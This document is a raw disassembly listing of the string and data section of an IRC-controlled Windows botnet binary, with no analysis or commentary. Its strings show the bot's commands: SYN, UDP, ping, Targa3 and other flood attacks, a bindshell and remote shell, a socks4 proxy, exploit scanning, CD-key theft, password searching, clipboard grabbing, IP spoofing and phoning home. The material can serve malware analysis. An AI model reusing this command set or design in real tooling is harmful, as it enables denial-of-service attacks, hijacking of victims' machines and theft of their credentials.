a433 db '433',0 ; DATA XREF: sub_401C87+260�o
aNickS db 'NICK %s',0Dh,0Ah,0 ; DATA XREF: sub_401C87+288�o
align 4
aKick db 'KICK',0 ; DATA XREF: sub_401C87+2DD�o
align 10h
unk_43FBE0 db 2Dh ; - ; DATA XREF: sub_401C87+340�o
db 3, 34h, 2
db 6Dh ; m
db 61h, 69h, 6Eh
db 2
db 3, 2Dh, 20h
aUserSLoggedOut db 'User %s logged out.',0
aNoticeSS db 'NOTICE %s :%s',0Dh,0Ah,0 ; DATA XREF: sub_401C87+359�o
aJoinSS_0 db 'JOIN %s %s',0Dh,0Ah,0 ; DATA XREF: sub_401C87+3A3�o
align 10h
aNick db 'NICK',0 ; DATA XREF: sub_401C87+3B9�o
align 4
aSS db ':%s%s',0 ; DATA XREF: sub_401C87+4D9�o
align 10h
aPart db 'PART',0 ; DATA XREF: sub_401C87+501�o
align 4
aQuit db 'QUIT',0 ; DATA XREF: sub_401C87+512�o
align 10h
a353 db '353',0 ; DATA XREF: sub_401C87+550�o
unk_43FC44 db 2Dh ; - ; DATA XREF: sub_401C87+581�o
db 3, 34h, 2
db 6Dh ; m
db 61h, 69h, 6Eh
db 2
db 3, 2Dh, 20h
aJoinedChannelS db 'Joined channel: %s.',0
unk_43FC64 db 2Dh ; - ; DATA XREF: sub_401C87+5A8�o
db 3, 34h, 2
db 6Dh ; m
db 61h, 69h, 6Eh
db 2
db 3, 2Dh, 20h
aUserSLoggedO_0 db 'User: %s logged out.',0
align 4
aPart_0 db 'PART',0 ; DATA XREF: sub_401C87+5C5�o
align 10h
aNoticeSS_0 db 'NOTICE %s :%s',0Dh,0Ah,0 ; DATA XREF: sub_401C87+5E9�o
aPrivmsg db 'PRIVMSG',0 ; DATA XREF: sub_401C87+5F4�o
aNotice db 'NOTICE',0 ; DATA XREF: sub_401C87+605�o
align 10h
a332 db '332',0 ; DATA XREF: sub_401C87+616�o
aPrivmsg_0 db 'PRIVMSG',0 ; DATA XREF: sub_401C87+637�o
aNotice_0 db 'NOTICE',0 ; DATA XREF: sub_401C87+64C�o
align 4
dword_43FCC4 dd 43434401h, 0 ; DATA XREF: sub_401C87+68E�o
aSend_1 db 'SEND',0 ; DATA XREF: sub_401C87+6AC�o
align 4
aS_20 db '%s',0 ; DATA XREF: sub_401C87+6D9�o
align 4
aS_21 db '%s',0 ; DATA XREF: sub_401C87+6F1�o
align 4
unk_43FCDC db 2Dh ; - ; DATA XREF: sub_401C87+74F�o
db 3, 34h, 2
db 64h ; d
db 2 dup(63h), 2
db 3
aReceiveFileSFr db '- Receive file: ',27h,'%s',27h,' from user: %s.',0
align 4
aNotice_1 db 'NOTICE',0 ; DATA XREF: sub_401C87+7AB�o
align 4
asc_43FD14: ; DATA XREF: sub_401C87+7D0�o
unicode 0, <#>,0
dword_43FD18 dd 52455601h, 4E4F4953h, 1 ; DATA XREF: sub_401C87+856�o
dword_43FD24 dd 49544F4Eh, 25204543h, 13A2073h, 53524556h, 204E4F49h
; DATA XREF: sub_401C87+881�o
dd 0D017325h, 0Ah
dword_43FD40 dd 4E495001h, 47h ; DATA XREF: sub_401C87+88C�o
dword_43FD48 dd 49544F4Eh, 25204543h, 13A2073h, 474E4950h, 1732520h
; DATA XREF: sub_401C87+8BD�o
dd 0A0Dh
unk_43FD60 db 2Dh ; - ; DATA XREF: sub_401C87+8E0�o
db 3, 34h, 2
db 64h ; d
db 2 dup(63h), 2
db 3
aFailedToStartT db '- Failed to start transfer thread, error: <%d>.',0
align 10h
unk_43FDA0 db 2Dh ; - ; DATA XREF: sub_401C87+8FE�o
db 3, 34h, 2
db 64h ; d
db 2 dup(63h), 2
db 3
aReceiveFileSFa db '- Receive file: ',27h,'%s',27h,' failed from unauthorized user: %s.',0
align 4
aChat db 'CHAT',0 ; DATA XREF: sub_401C87+91B�o
align 4
aS db '%s',0 ; DATA XREF: sub_401C87+958�o
align 10h
unk_43FDF0 db 2Dh ; - ; DATA XREF: sub_401C87+9AF�o
db 3, 34h, 2
db 64h ; d
db 2 dup(63h), 2
db 3
aChatFromUserS_ db '- Chat from user: %s.',0
align 10h
unk_43FE10 db 2Dh ; - ; DATA XREF: sub_401C87+A08�o
db 3, 34h, 2
db 64h ; d
db 2 dup(63h), 2
db 3
aFailedToStartC db '- Failed to start chat thread, error: <%d>.',0
align 4
unk_43FE48 db 2Dh ; - ; DATA XREF: sub_401C87+A2E�o
db 3, 34h, 2
db 64h ; d
db 2 dup(63h), 2
db 3
aChatAlreadyAct db '- Chat already active with user: %s.',0
align 4
unk_43FE78 db 2Dh ; - ; DATA XREF: sub_401C87+A3F�o
db 3, 34h, 2
db 64h ; d
db 2 dup(63h), 2
db 3
aChatFailedByUn db '- Chat failed by unauthorized user: %s.',0
align 4
aLogin db 'login',0 ; DATA XREF: sub_401C87+A62�o
asc_43FEB2 db 'l',0 ; DATA XREF: sub_401C87+A7A�o
a332_0 db '332',0 ; DATA XREF: sub_401C87+A9C�o
asc_43FEB8 db ' :',0 ; DATA XREF: sub_401C87:loc_40277B�o
align 4
aD db '$%d-',0 ; DATA XREF: sub_401C87+B58�o
align 4
aD_0 db '$%d',0 ; DATA XREF: sub_401C87+C0E�o
aMe db '$me',0 ; DATA XREF: sub_401C87+C82�o
aUser db '$user',0 ; DATA XREF: sub_401C87+C94�o
align 4
aChan db '$chan',0 ; DATA XREF: sub_401C87+CA5�o
align 4
aRndnick db '$rndnick',0 ; DATA XREF: sub_401C87+CC1�o
align 4
aServer db '$server',0 ; DATA XREF: sub_401C87+CD2�o
aChr db '$chr(',0 ; DATA XREF: sub_401C87+CDD�o
align 4
aChr_0 db '$chr(',0 ; DATA XREF: sub_401C87:loc_40297A�o
asc_43FEFE db ')',0 ; DATA XREF: sub_401C87+D1B�o
a63 db '63',0 ; DATA XREF: sub_401C87+D43�o
align 4
asc_43FF04: ; DATA XREF: sub_401C87+E1E�o
unicode 0, < >
aRndnick_0 db 'rndnick',0 ; DATA XREF: sub_401C87+E68�o
aRn db 'rn',0 ; DATA XREF: sub_401C87+E80�o
align 4
aDie db 'die',0 ; DATA XREF: sub_401C87+E95�o
aD_1: ; DATA XREF: sub_401C87+EAA�o
unicode 0, <d>,0
aLogout db 'logout',0 ; DATA XREF: sub_401C87+EBF�o
align 4
aLo db 'lo',0 ; DATA XREF: sub_401C87+ED4�o
align 4
aVersion db 'version',0 ; DATA XREF: sub_401C87+EE9�o
aVer db 'ver',0 ; DATA XREF: sub_401C87+EFE�o
aDedication db 'dedication',0 ; DATA XREF: sub_401C87+F13�o
align 10h
aDed db 'ded',0 ; DATA XREF: sub_401C87+F28�o
aSpeedtest db 'speedtest',0 ; DATA XREF: sub_401C87+F3D�o
align 10h
aSt db 'st',0 ; DATA XREF: sub_401C87+F52�o
align 4
aSecure db 'secure',0 ; DATA XREF: sub_401C87+F67�o
align 4
aSec db 'sec',0 ; DATA XREF: sub_401C87+F7C�o
aUnsecure db 'unsecure',0 ; DATA XREF: sub_401C87+F91�o
align 4
aUnsec db 'unsec',0 ; DATA XREF: sub_401C87+FA6�o
align 4
aBindshell db 'bindshell',0 ; DATA XREF: sub_401C87+FBB�o
align 10h
aBd db 'bd',0 ; DATA XREF: sub_401C87+FD0�o
align 4
aBindshellstop db 'bindshellstop',0 ; DATA XREF: sub_401C87+FE5�o
align 4
aServer_1 db 'Server',0 ; DATA XREF: sub_401C87+FFE�o
align 4
dword_43FF9C dd 234032Dh, 646E6962h, 6C656873h, 2D03026Ch, 0
; DATA XREF: sub_401C87+1003�o
aSocks4 db 'socks4',0 ; DATA XREF: sub_401C87+1025�o
align 4
aS4 db 's4',0 ; DATA XREF: sub_401C87+103A�o
align 4
aSocks4stop db 'socks4stop',0 ; DATA XREF: sub_401C87+104F�o
align 4
aServer_2 db 'Server',0 ; DATA XREF: sub_401C87+1068�o
align 10h
dword_43FFD0 dd 234032Dh, 6B636F73h, 3023473h, 2Dh ; DATA XREF: sub_401C87+106D�o
aRloginstop db 'rloginstop',0 ; DATA XREF: sub_401C87+1075�o
align 4
aServer_3 db 'Server',0 ; DATA XREF: sub_401C87+108E�o
align 4
dword_43FFF4 dd 234032Dh, 676F6C72h, 2646E69h, 2D03h ; DATA XREF: sub_401C87+1093�o
aHttpstop db 'httpstop',0 ; DATA XREF: sub_401C87+109E�o
align 10h
aServer_4 db 'Server',0 ; DATA XREF: sub_401C87+10B7�o
align 4
dword_440018 dd 234032Dh, 70747468h, 2D030264h, 0 ; DATA XREF: sub_401C87+10BC�o
aLogstop db 'logstop',0 ; DATA XREF: sub_401C87+10C7�o
aLogList db 'Log list',0 ; DATA XREF: sub_401C87+10E0�o
align 4
dword_44003C dd 234032Dh, 2676F6Ch, 2D03h ; DATA XREF: sub_401C87+10E5�o
aRedirectstop db 'redirectstop',0 ; DATA XREF: sub_401C87+10F0�o
align 4
aTcpRedirect db 'TCP redirect',0 ; DATA XREF: sub_401C87+1109�o
align 4
dword_440068 dd 234032Dh, 69646572h, 74636572h, 2D0302h ; DATA XREF: sub_401C87+110E�o
dword_440078 dd 736F6464h, 6F74732Eh, 70h ; DATA XREF: sub_401C87+1119�o
dword_440084 dd 536F4444h, 6F6C6620h, 646Fh ; DATA XREF: sub_401C87+1132�o
dword_440090 dd 234032Dh, 736F6464h, 2D0302h ; DATA XREF: sub_401C87+1137�o
aSynstop db 'synstop',0 ; DATA XREF: sub_401C87+1142�o
aSynFlood db 'Syn flood',0 ; DATA XREF: sub_401C87+115B�o
align 10h
dword_4400B0 dd 234032Dh, 26E7973h, 2D03h ; DATA XREF: sub_401C87+1160�o
aSkysynstop db 'skysynstop',0 ; DATA XREF: sub_401C87+116B�o
align 4
aSkysynFlood db 'SkySyn flood',0 ; DATA XREF: sub_401C87+1184�o
align 4
dword_4400D8 dd 234032Dh, 73796B73h, 3026E79h, 2Dh ; DATA XREF: sub_401C87+1189�o
aTarga3stop db 'targa3stop',0 ; DATA XREF: sub_401C87+1194�o
align 4
aTarga3Flood db 'Targa3 flood',0 ; DATA XREF: sub_401C87+11AD�o
align 4
dword_440104 dd 234032Dh, 67726174h, 3023361h, 2Dh ; DATA XREF: sub_401C87+11B2�o
aWonkstop db 'wonkstop',0 ; DATA XREF: sub_401C87+11BD�o
align 10h
aWonkFlood db 'Wonk flood',0 ; DATA XREF: sub_401C87+11D6�o
align 4
dword_44012C dd 234032Dh, 6B6E6F77h, 2D0302h ; DATA XREF: sub_401C87+11DB�o
aPacketstop db 'packetstop',0 ; DATA XREF: sub_401C87+11E6�o
align 4
aDdosFlood db 'DDoS flood',0 ; DATA XREF: sub_401C87+1207�o
align 10h
dword_440150 dd 234032Dh, 736F6464h, 2D0302h ; DATA XREF: sub_401C87+120C�o
dword_44015C dd 206E7953h, 6F6F6C66h, 64h ; DATA XREF: sub_401C87+1225�o
dword_440168 dd 234032Dh, 26E7973h, 2D03h ; DATA XREF: sub_401C87+122A�o
dword_440174 dd 20504455h, 6F6F6C66h, 64h ; DATA XREF: sub_401C87+1246�o
dword_440180 dd 234032Dh, 2706475h, 2D03h ; DATA XREF: sub_401C87+124B�o
dword_44018C dd 676E6950h, 6F6C6620h, 646Fh ; DATA XREF: sub_401C87+1264�o
dword_440198 dd 234032Dh, 676E6970h, 2D0302h ; DATA XREF: sub_401C87+1269�o
dword_4401A4 dd 67726154h, 66203361h, 646F6F6Ch, 0 ; DATA XREF: sub_401C87+1285�o
dword_4401B4 dd 234032Dh, 67726174h, 3023361h, 2Dh ; DATA XREF: sub_401C87+128A�o
dword_4401C4 dd 6B6E6F57h, 6F6C6620h, 646Fh ; DATA XREF: sub_401C87+12A3�o
dword_4401D0 dd 234032Dh, 6B6E6F77h, 2D0302h ; DATA XREF: sub_401C87+12A8�o
dword_4401DC dd 6E757354h, 20696D61h, 6F6F6C66h, 64h ; DATA XREF: sub_401C87+12C4�o
dword_4401EC dd 234032Dh, 6E757374h, 2696D61h, 2D03h ; DATA XREF: sub_401C87+12C9�o
dword_4401FC dd 64736957h, 61206D6Fh, 63617474h, 6Bh ; DATA XREF: sub_401C87+12E2�o
dword_44020C dd 234032Dh, 64736977h, 3026D6Fh, 2Dh ; DATA XREF: sub_401C87+12E7�o
dword_44021C dd 53796B53h, 66206E79h, 646F6F6Ch, 0 ; DATA XREF: sub_401C87+1303�o
dword_44022C dd 234032Dh, 73796B73h, 3026E79h, 2Dh ; DATA XREF: sub_401C87+1308�o
unk_44023C db 2Dh ; - ; DATA XREF: sub_401C87+1322�o
db 3, 34h, 2
db 64h ; d
db 64h, 6Fh, 73h
db 2
db 3, 2Dh, 20h
aAllPacketingAc db 'All packeting activity has been halted.',0
aTsunamistop db 'tsunamistop',0 ; DATA XREF: sub_401C87+133C�o
aTsunamiFlood db 'Tsunami flood',0 ; DATA XREF: sub_401C87+1355�o
align 4
dword_44028C dd 234032Dh, 6E757374h, 2696D61h, 2D03h ; DATA XREF: sub_401C87+135A�o
aWisdomstop db 'wisdomstop',0 ; DATA XREF: sub_401C87+1365�o
align 4
aWisdomAttack db 'Wisdom attack',0 ; DATA XREF: sub_401C87+137E�o
align 4
dword_4402B8 dd 234032Dh, 64736977h, 3026D6Fh, 2Dh ; DATA XREF: sub_401C87+1383�o
aUdpstop db 'udpstop',0 ; DATA XREF: sub_401C87+138E�o
aUdpFlood db 'UDP flood',0 ; DATA XREF: sub_401C87+13A7�o
align 4
dword_4402DC dd 234032Dh, 2706475h, 2D03h ; DATA XREF: sub_401C87+13AC�o
aPingstop db 'pingstop',0 ; DATA XREF: sub_401C87+13B7�o
align 4
aPingFlood db 'Ping flood',0 ; DATA XREF: sub_401C87+13D0�o
align 10h
dword_440300 dd 234032Dh, 676E6970h, 2D0302h ; DATA XREF: sub_401C87+13D5�o
aTftpstop db 'tftpstop',0 ; DATA XREF: sub_401C87+13E0�o
align 4
aServer_5 db 'Server',0 ; DATA XREF: sub_401C87+13F9�o
align 10h
dword_440320 dd 234032Dh, 70746674h, 2D030264h, 0 ; DATA XREF: sub_401C87+13FE�o
aFindfilestop db 'findfilestop',0 ; DATA XREF: sub_401C87+1409�o
align 10h
aFfstop db 'ffstop',0 ; DATA XREF: sub_401C87+141E�o
align 4
aProcsstop db 'procsstop',0 ; DATA XREF: sub_401C87+1433�o
align 4
aPsstop db 'psstop',0 ; DATA XREF: sub_401C87+1448�o
align 4
aClonestop db 'clonestop',0 ; DATA XREF: sub_401C87+145D�o
align 4
aClone db 'Clone',0 ; DATA XREF: sub_401C87+1476�o
align 10h
dword_440370 dd 234032Dh, 6E6F6C63h, 3027365h, 2Dh ; DATA XREF: sub_401C87+147B�o
aSecurestop db 'securestop',0 ; DATA XREF: sub_401C87+1486�o
align 4
aSecure_1 db 'Secure',0 ; DATA XREF: sub_401C87+149F�o
align 4
dword_440394 dd 234032Dh, 75636573h, 3026572h, 2Dh ; DATA XREF: sub_401C87+14A4�o
aScanstop db 'scanstop',0 ; DATA XREF: sub_401C87+14AF�o
align 10h
aScan_0 db 'Scan',0 ; DATA XREF: sub_401C87+14C8�o
align 4
dword_4403B8 dd 234032Dh, 6E616373h, 2D0302h ; DATA XREF: sub_401C87+14CD�o
aScanstats db 'scanstats',0 ; DATA XREF: sub_401C87+14D8�o
align 10h
aStats db 'stats',0 ; DATA XREF: sub_401C87+14ED�o
align 4
aTransferstats db 'transferstats',0 ; DATA XREF: sub_401C87+1502�o
align 4
aTrstats db 'trstats',0 ; DATA XREF: sub_401C87+1517�o
aConnectbacksta db 'connectbackstats',0 ; DATA XREF: sub_401C87+152C�o
align 4
aCbstats db 'cbstats',0 ; DATA XREF: sub_401C87+1541�o
aExploitlist db 'exploitlist',0 ; DATA XREF: sub_401C87+1556�o
aExplist db 'explist',0 ; DATA XREF: sub_401C87+156B�o
aReconnect db 'reconnect',0 ; DATA XREF: sub_401C87+1580�o
aR db 'r',0 ; DATA XREF: sub_401C87+1595�o
aDisconnect db 'disconnect',0 ; DATA XREF: sub_401C87+15AA�o
align 4
aDc db 'dc',0 ; DATA XREF: sub_401C87+15BF�o
align 4
aQuit_0 db 'quit',0 ; DATA XREF: sub_401C87+15D4�o
align 2
aQ db 'q',0 ; DATA XREF: sub_401C87+15E9�o
aStatus db 'status',0 ; DATA XREF: sub_401C87+15FE�o
align 4
aS_0: ; DATA XREF: sub_401C87+1613�o
unicode 0, <s>,0
aId db 'id',0 ; DATA XREF: sub_401C87+1628�o
align 4
aI: ; DATA XREF: sub_401C87+163D�o
unicode 0, <i>,0
aReboot db 'reboot',0 ; DATA XREF: sub_401C87+1652�o
align 10h
unk_440460 db 2Dh ; - ; DATA XREF: sub_401C87+1669�o
db 3, 34h, 2
db 6Dh ; m
db 61h, 69h, 6Eh
db 2
db 3, 2Dh, 20h
aRebootingSyste db 'Rebooting system.',0
align 10h
unk_440480 db 2Dh ; - ; DATA XREF: sub_401C87+1670�o
db 3, 34h, 2
db 6Dh ; m
db 61h, 69h, 6Eh
db 2
db 3, 2Dh, 20h
aFailedToReboot db 'Failed to reboot system.',0
align 4
aThreads db 'threads',0 ; DATA XREF: sub_401C87+16A4�o
aT: ; DATA XREF: sub_401C87+16B9�o
unicode 0, <t>,0
aAliases db 'aliases',0 ; DATA XREF: sub_401C87+16CE�o
aAl db 'al',0 ; DATA XREF: sub_401C87+16E3�o
align 10h
aLog db 'log',0 ; DATA XREF: sub_401C87+16F8�o
aLg db 'lg',0 ; DATA XREF: sub_401C87+170D�o
align 4
aClearlog db 'clearlog',0 ; DATA XREF: sub_401C87+1722�o
align 4
aClg db 'clg',0 ; DATA XREF: sub_401C87+1737�o
aNetinfo db 'netinfo',0 ; DATA XREF: sub_401C87+174C�o
aNi db 'ni',0 ; DATA XREF: sub_401C87+1761�o
align 4
aSysinfo db 'sysinfo',0 ; DATA XREF: sub_401C87+1776�o
aSi db 'si',0 ; DATA XREF: sub_401C87+178B�o
align 10h
aRemove db 'remove',0 ; DATA XREF: sub_401C87+17A0�o
align 4
aRm db 'rm',0 ; DATA XREF: sub_401C87+17B5�o
align 4
aProcs db 'procs',0 ; DATA XREF: sub_401C87+17CA�o
align 4
aPs db 'ps',0 ; DATA XREF: sub_401C87+17DF�o
align 4
aGetcdkeys db 'getcdkeys',0 ; DATA XREF: sub_401C87+17F4�o
align 4
aKey db 'key',0 ; DATA XREF: sub_401C87+1809�o
aUptime db 'uptime',0 ; DATA XREF: sub_401C87+181E�o
align 10h
aUp db 'up',0 ; DATA XREF: sub_401C87+1833�o
align 4
aDriveinfo db 'driveinfo',0 ; DATA XREF: sub_401C87+1848�o
align 10h
aDrv db 'drv',0 ; DATA XREF: sub_401C87+185D�o
aTestdlls db 'testdlls',0 ; DATA XREF: sub_401C87+1872�o
align 10h
aDll db 'dll',0 ; DATA XREF: sub_401C87+1887�o
aOpencmd db 'opencmd',0 ; DATA XREF: sub_401C87+189C�o
aOcmd db 'ocmd',0 ; DATA XREF: sub_401C87+18B1�o
align 4
aCmdstop db 'cmdstop',0 ; DATA XREF: sub_401C87+18C6�o
aRemoteShell db 'Remote shell',0 ; DATA XREF: sub_401C87+18DF�o
align 4
dword_44056C dd 234032Dh, 2646D63h, 2D03h ; DATA XREF: sub_401C87+18E4�o
dword_440578 dd 6F6877h ; DATA XREF: sub_401C87+18EF�o
dword_44057C dd 234032Dh, 69676F6Ch, 696C206Eh, 3027473h, 2Dh
; DATA XREF: sub_401C87+190C�o
dword_440590 dd 706D453Ch, 3E7974h ; DATA XREF: sub_401C87:loc_4035BE�o
dword_440598 dd 202E6425h, 7325h ; DATA XREF: sub_401C87+1946�o
unk_4405A0 db 2Dh ; - ; DATA XREF: sub_401C87+197E�o
db 3, 34h, 2
db 6Dh ; m
db 61h, 69h, 6Eh
db 2
db 3, 2Dh, 20h
aLoginListCompl db 'Login list complete.',0
align 4
aSpoof db 'spoof',0 ; DATA XREF: sub_401C87+199C�o
align 4
aOff db 'off',0 ; DATA XREF: sub_401C87+19B3�o
unk_4405D0 db 2Dh ; - ; DATA XREF: sub_401C87+19CE�o
db 3, 34h, 2
db 77h ; w
db 69h, 73h, 64h
db 6Fh ; o
db 6Dh, 28h, 73h
db 70h ; p
db 2 dup(6Fh), 66h
db 29h ; )
db 2, 3, 2Dh
aSpoofingDisabl db ' Spoofing disabled.',0
aGetclip db 'getclip',0 ; DATA XREF: sub_401C87+1A0C�o
aGc db 'gc',0 ; DATA XREF: sub_401C87+1A21�o
align 4
aFlusharp db 'flusharp',0 ; DATA XREF: sub_401C87+1A36�o
align 10h
aFarp db 'farp',0 ; DATA XREF: sub_401C87+1A4B�o
align 4
aFlushdns db 'flushdns',0 ; DATA XREF: sub_401C87+1A60�o
align 4
aFdns db 'fdns',0 ; DATA XREF: sub_401C87+1A75�o
align 4
aCurrentip db 'currentip',0 ; DATA XREF: sub_401C87+1A8A�o
align 4
aCip db 'cip',0 ; DATA XREF: sub_401C87+1A9F�o
aRloginserver db 'rloginserver',0 ; DATA XREF: sub_401C87+1AB4�o
align 4
aRlogin db 'rlogin',0 ; DATA XREF: sub_401C87+1AC9�o
align 4
aHttpserver db 'httpserver',0 ; DATA XREF: sub_401C87+1ADE�o
align 10h
aHttp db 'http',0 ; DATA XREF: sub_401C87+1AF3�o
align 4
aTftpserver db 'tftpserver',0 ; DATA XREF: sub_401C87+1B08�o
align 4
aTftp db 'tftp',0 ; DATA XREF: sub_401C87+1B1D�o
align 4
aCrash db 'crash',0 ; DATA XREF: sub_401C87+1B32�o
align 4
dword_440684 dd 234032Dh, 6E69616Dh, 202D0302h, 73617243h, 676E6968h
; DATA XREF: sub_401C87+1B48�o
dd 746F6220h, 2Eh
aCrash_0 db 'crash',0 ; DATA XREF: sub_401C87+1B82�o
align 4
aScanall db 'scanall',0 ; DATA XREF: sub_401C87+1B98�o
aSa db 'sa',0 ; DATA XREF: sub_401C87+1BAD�o
align 4
aPhonehome db 'phonehome',0 ; DATA XREF: sub_401C87+1BC2�o
align 10h
aNoticeSPhoning db 'NOTICE %s :PHONING HOME: hi ;).',0Dh,0Ah,0 ; DATA XREF: sub_401C87+1BD9�o
align 4
aFindpass db 'findpass',0 ; DATA XREF: sub_401C87+1BEC�o
align 10h
aFp db 'fp',0 ; DATA XREF: sub_401C87+1BFD�o
align 4
unk_4406F4 db 2Dh ; - ; DATA XREF: sub_401C87+1C2B�o
db 3, 34h, 2
db 66h ; f
db 69h, 6Eh, 64h
db 70h ; p
db 61h, 2 dup(73h)
db 2
db 3, 2Dh, 20h
aSearchingForPa db 'Searching for password.',0
unk_44071C db 2Dh ; - ; DATA XREF: sub_401C87+1CA7�o
db 3, 34h, 2
db 66h ; f
db 69h, 6Eh, 64h
db 70h ; p
db 61h, 2 dup(73h)
db 2
db 3, 2Dh, 20h
aFailedToStar_0 db 'Failed to start search thread, error: <%d>.',0
unk_440758 db 2Dh ; - ; DATA XREF: sub_401C87+1D1A�o
db 3, 34h, 2
db 73h ; s
db 63h, 61h, 6Eh
db 61h ; a
db 2 dup(6Ch), 2
db 3
aAlreadyDScanni db '- Already %d scanning threads. Too many specified.',0
aRandom db 'Random',0 ; DATA XREF: sub_401C87+1ECD�o
align 10h
aSequential db 'Sequential',0 ; DATA XREF: sub_401C87+1ED4�o
align 10h
unk_4407B0 db 2Dh ; - ; DATA XREF: sub_401C87+1EFF�o
db 3, 34h, 2
db 73h ; s
db 63h, 61h, 6Eh
db 61h ; a
db 2 dup(6Ch), 2
db 3
aSPortScanStart db '- %s Port Scan started on %s:%d with a delay of %d seconds for %d'
db ' minutes using %d threads.',0
align 4
unk_44081C db 2Dh ; - ; DATA XREF: sub_401C87+1F5E�o
db 3, 34h, 2
db 73h ; s
db 63h, 61h, 6Eh
db 61h ; a
db 2 dup(6Ch), 2
db 3
aFailedToStar_1 db '- Failed to start scan thread, error: <%d>.',0
align 4
unk_440858 db 2Dh ; - ; DATA XREF: sub_401C87:loc_403C47�o
db 3, 34h, 2
db 73h ; s
db 63h, 61h, 6Eh
db 61h ; a
db 2 dup(6Ch), 2
db 3
aFailedToStar_2 db '- Failed to start scan, port is invalid.',0
align 10h
unk_440890 db 2Dh ; - ; DATA XREF: sub_401C87+1FD6�o
db 3, 34h, 2
db 74h ; t
db 66h, 74h, 70h
db 64h ; d
db 2, 3, 2Dh
aAlreadyRunning db ' Already running.',0
align 10h
unk_4408B0 db 2Dh ; - ; DATA XREF: sub_401C87+2083�o
db 3, 34h, 2
db 74h ; t
db 66h, 74h, 70h
db 64h ; d
db 2, 3, 2Dh
aServerStartedO db ' Server started on Port: %d, File: %s.',0
align 4
unk_4408E4 db 2Dh ; - ; DATA XREF: sub_401C87+20DC�o
db 3, 34h, 2
db 74h ; t
db 66h, 74h, 70h
db 64h ; d
db 2, 3, 2Dh
aFailedToStar_3 db ' Failed to start server thread, error: <%d>.',0
align 10h
unk_440920 db 2Dh ; - ; DATA XREF: sub_401C87+21F8�o
db 3, 34h, 2
db 68h ; h
db 2 dup(74h), 70h
db 64h ; d
db 2, 3, 2Dh
aServerListenin db ' Server listening on IP: %s:%d, Directory: %s\.',0
unk_44095C db 2Dh ; - ; DATA XREF: sub_401C87+2251�o
db 3, 34h, 2
db 68h ; h
db 2 dup(74h), 70h
db 64h ; d
db 2, 3, 2Dh
aFailedToStar_4 db ' Failed to start server thread, error: <%d>.',0
align 4
unk_440998 db 2Dh ; - ; DATA XREF: sub_401C87+232F�o
db 3, 34h, 2
db 72h ; r
db 6Ch, 6Fh, 67h
db 69h ; i
db 6Eh, 64h, 2
db 3
aServerListen_0 db '- Server listening on IP: %s:%d, Username: %s.',0
unk_4409D4 db 2Dh ; - ; DATA XREF: sub_401C87+2388�o
db 3, 34h, 2
db 72h ; r
db 6Ch, 6Fh, 67h
db 69h ; i
db 6Eh, 64h, 2
db 3
aFailedToStar_5 db '- Failed to start server thread, error: <%d>.',0
align 10h
unk_440A10 db 2Dh ; - ; DATA XREF: sub_401C87+241B�o
db 3, 34h, 2
db 66h ; f
db 6Ch, 75h, 73h
db 68h ; h
db 64h, 6Eh, 73h
db 2
db 3, 2Dh, 20h
aDnsCacheFlushe db 'DNS cache flushed.',0
align 4
unk_440A34 db 2Dh ; - ; DATA XREF: sub_401C87:loc_4040A9�o
db 3, 34h, 2
db 66h ; f
db 6Ch, 75h, 73h
db 68h ; h
db 64h, 6Eh, 73h
db 2
db 3, 2Dh, 20h
aFailedToFlushD db 'Failed to flush DNS cache.',0
align 10h
unk_440A60 db 2Dh ; - ; DATA XREF: sub_401C87:loc_4040B0�o
db 3, 34h, 2
db 66h ; f
db 6Ch, 75h, 73h
db 68h ; h
db 64h, 6Eh, 73h
db 2
db 3, 2Dh, 20h
aFailedToLoadDn db 'Failed to load dnsapi.dll.',0
align 4
unk_440A8C db 2Dh ; - ; DATA XREF: sub_401C87+2453�o
db 3, 34h, 2
db 66h ; f
db 6Ch, 75h, 73h
db 68h ; h
db 64h, 6Eh, 73h
db 2
db 3, 2Dh, 20h
aArpCacheFlushe db 'ARP cache flushed.',0
align 10h
unk_440AB0 db 2Dh ; - ; DATA XREF: sub_401C87:loc_4040E1�o
db 3, 34h, 2
db 66h ; f
db 6Ch, 75h, 73h
db 68h ; h
db 64h, 6Eh, 73h
db 2
db 3, 2Dh, 20h
aFailedToFlushA db 'Failed to flush ARP cache.',0
align 4
dword_440ADC dd 234032Dh, 70696C63h, 72616F62h, 61642064h, 3026174h
; DATA XREF: sub_401C87+246A�o
dd 2Dh
dword_440AF4 dd 234032Dh, 6E69616Dh, 202D0302h, 20746547h, 70696C43h
; DATA XREF: sub_401C87+2498�o
dd 72616F62h, 2E64h
unk_440B10 db 2Dh ; - ; DATA XREF: sub_401C87+24AE�o
db 3, 34h, 2
db 63h ; c
db 6Dh, 64h, 2
db 3
aRemoteShellAlr db '- Remote shell already running.',0
align 4
unk_440B3C db 2Dh ; - ; DATA XREF: sub_401C87+24CD�o
db 3, 34h, 2
db 63h ; c
db 6Dh, 64h, 2
db 3
aCouldnTOpenRem db '- Couldn',27h,'t open remote shell.',0
align 4
unk_440B64 db 2Dh ; - ; DATA XREF: sub_401C87:loc_40415E�o
db 3, 34h, 2
db 63h ; c
db 6Dh, 64h, 2
db 3
aRemoteShellRea db '- Remote shell ready.',0
align 4
dword_440B84 dd 234032Dh, 6E69616Dh, 202D0302h, 69747055h, 203A656Dh
; DATA XREF: sub_401C87+2566�o
dd 2E7325h
dword_440B9C dd 234032Dh, 656B6463h, 3027379h ; DATA XREF: sub_401C87+25B5�o
aSearchComplete db '- Search completed.',0
unk_440BBC db 2Dh ; - ; DATA XREF: sub_401C87+25E1�o
db 3, 34h, 2
db 70h ; p
db 72h, 6Fh, 63h
db 73h ; s
db 2, 3, 2Dh
aAlreadyRunni_0 db ' Already running.',0
align 4
aFull db 'full',0 ; DATA XREF: sub_401C87+2643�o
align 4
dword_440BE4 dd 234032Dh, 636F7270h, 2D030273h, 6F725020h, 73656363h
; DATA XREF: sub_401C87+2663�o
dd 696C2073h, 2E7473h
unk_440C00 db 2Dh ; - ; DATA XREF: sub_401C87+26C2�o
db 3, 34h, 2
db 70h ; p
db 72h, 6Fh, 63h
db 73h ; s
db 2, 3, 2Dh
aFailedToStartL db ' Failed to start listing thread, error: <%d>.',0
align 4
dword_440C3C dd 234032Dh, 6E69616Dh, 202D0302h, 6F6D6552h, 676E6976h
; DATA XREF: sub_401C87+26F3�o
dd 746F4220h, 2Eh
dword_440C58 dd 234032Dh, 6E69616Dh, 202D0302h, 74737953h, 49206D65h
; DATA XREF: sub_401C87+2748�o
dd 2E6F666Eh, 0
dword_440C74 dd 234032Dh, 6E69616Dh, 202D0302h, 7774654Eh, 206B726Fh
; DATA XREF: sub_401C87+2777�o
dd 6F666E49h, 2Eh
